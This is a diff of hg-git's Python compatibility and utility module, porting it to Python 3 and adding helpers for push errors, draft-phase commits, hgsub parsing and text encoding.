@@ -1,33 +1,63 @@
 """Compatibility functions for old Mercurial versions and other utility
 functions."""
 
-from __future__ import absolute_import, print_function
+from __future__ import generator_stop
 
+import collections
+import contextlib
 import re
 
-try:
-    from collections import OrderedDict
-except ImportError:
-    from ordereddict import OrderedDict
-
 from dulwich import errors
 from mercurial.i18n import _
 from mercurial import (
     error,
-    lock as lockmod,
+    extensions,
+    phases,
+    util as hgutil,
+    pycompat,
 )
 
-from . import compat
-
 gitschemes = (b'git', b'git+ssh', b'git+http', b'git+https')
 
 
+@contextlib.contextmanager
+def abort_push_on_keyerror():
+    """raise a rather verbose error on missing commits"""
+
+    try:
+        yield
+    except KeyError as e:
+        raise error.Abort(
+            b'cannot push git commit %s as it is not present locally'
+            % e.args[0][:12],
+            hint=(
+                b'please try pulling first, or as a fallback run git-cleanup '
+                b'to re-export the missing commits'
+            ),
+        )
+
+
+@contextlib.contextmanager
+def forcedraftcommits():
+    """Context manager that forces new commits to at least draft,
+    regardless of configuration.
+
+    """
+    with extensions.wrappedfunction(
+        phases,
+        'newcommitphase',
+        lambda orig, ui: phases.draft,
+    ):
+        yield
+
+
 def parse_hgsub(lines):
     """Fills OrderedDict with hgsub file content passed as list of lines"""
-    rv = OrderedDict()
+    # TODO: get rid of this code and rely on mercurial infrastructure
+    rv = collections.OrderedDict()
     for l in lines:
         ls = l.strip()
-        if not ls or ls[0] == b'#':
+        if not ls or ls.startswith(b'#'):
             continue
         name, value = l.split(b'=', 1)
         rv[name.strip()] = value.strip()
@@ -36,15 +66,16 @@ def parse_hgsub(lines):
 
 def serialize_hgsub(data):
     """Produces a string from OrderedDict hgsub content"""
-    return b''.join(b'%s = %s\n' % (n, v) for n, v in compat.iteritems(data))
+    return b''.join(b'%s = %s\n' % (n, v) for n, v in data.items())
 
 
 def parse_hgsubstate(lines):
     """Fills OrderedDict with hgsubtate file content passed as list of lines"""
-    rv = OrderedDict()
+    # TODO: get rid of this code and rely on mercurial infrastructure
+    rv = collections.OrderedDict()
     for l in lines:
         ls = l.strip()
-        if not ls or ls[0] == b'#':
+        if not ls or ls.startswith(b'#'):
             continue
         value, name = l.split(b' ', 1)
         rv[name.strip()] = value.strip()
@@ -58,11 +89,13 @@ def serialize_hgsubstate(data):
 
 def transform_notgit(f):
     '''use as a decorator around functions that call into dulwich'''
+
     def inner(*args, **kwargs):
         try:
             return f(*args, **kwargs)
         except errors.NotGitRepository:
             raise error.Abort(b'not a git repository')
+
     return inner
 
 
@@ -100,27 +133,15 @@ def isgitsshuri(uri):
         if len(giturl) > 1 and repopath.endswith(b'.git'):
             return True
         # use a simple regex to check if it is a fqdn regex
-        fqdn_re = (br'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}'
-                   br'(?<!-)\.)+[a-zA-Z]{2,63}$)')
+        fqdn_re = (
+            br'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}'
+            br'(?<!-)\.)+[a-zA-Z]{2,63}$)'
+        )
         if re.match(fqdn_re, giturl):
             return True
     return False
 
 
-def updatebookmarks(repo, changes, name=b'git_handler'):
-    """abstract writing bookmarks for backwards compatibility"""
-    bms = repo._bookmarks
-    tr = lock = wlock = None
-    try:
-        wlock = repo.wlock()
-        lock = repo.lock()
-        tr = repo.transaction(name)
-        bms.applychanges(repo, tr, changes)
-        tr.close()
-    finally:
-        lockmod.release(tr, lock, wlock)
-
-
 def checksafessh(host):
     """check if a hostname is a potentially unsafe ssh exploit (SEC)
 
@@ -131,7 +152,33 @@ def checksafessh(host):
 
     Raises an error.Abort when the url is unsafe.
     """
-    host = compat.unquote(host)
+    host = hgutil.urlreq.unquote(host)
     if host.startswith(b'-'):
-        raise error.Abort(_(b"potentially unsafe hostname: '%s'") %
-                          (host,))
+        raise error.Abort(_(b"potentially unsafe hostname: '%s'") % (host,))
+
+
+def decode_guess(string, encoding):
+    # text is not valid utf-8, try to make sense of it
+    if encoding:
+        try:
+            return string.decode(pycompat.sysstr(encoding)).encode('utf-8')
+        except UnicodeDecodeError:
+            pass
+
+    try:
+        return string.decode('latin-1').encode('utf-8')
+    except UnicodeDecodeError:
+        return string.decode('ascii', 'replace').encode('utf-8')
+
+
+# Stolen from hgsubversion
+def swap_out_encoding(new_encoding=b'UTF-8'):
+    try:
+        from mercurial import encoding
+
+        old = encoding.encoding
+        encoding.encoding = new_encoding
+    except (AttributeError, ImportError):
+        old = hgutil._encoding
+        hgutil._encoding = new_encoding
+    return old
